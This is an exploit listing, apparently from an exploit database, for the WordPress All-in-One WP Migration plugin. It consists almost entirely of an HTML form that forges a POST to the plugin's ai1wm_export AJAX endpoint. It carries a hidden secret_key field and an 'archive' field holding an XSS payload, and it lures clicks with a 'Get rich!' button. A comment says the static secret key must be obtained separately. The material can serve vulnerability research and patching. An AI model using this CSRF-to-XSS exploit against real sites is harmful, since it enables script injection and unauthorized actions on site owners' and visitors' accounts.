Share 
## https://sploitus.com/exploit?id=WPEX-ID:F84920E4-A1FE-47CF-9BA5-731989C70F58
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
  <!--
    Note: The secret key must be obtained through other means.
    It is stored in the site option `ai1wm_secret_key`, but is
    static for the lifetime of the site.
  -->
  <input type="hidden" name="secret_key" value="[secret_key]">
  <input type="hidden" name="ai1wm_manual_export" value="1">
  <input type="hidden" name="archive" value="<img src=x onclick=alert(/XSS/)>">

  <input type="submit" value="Get rich!">
</form>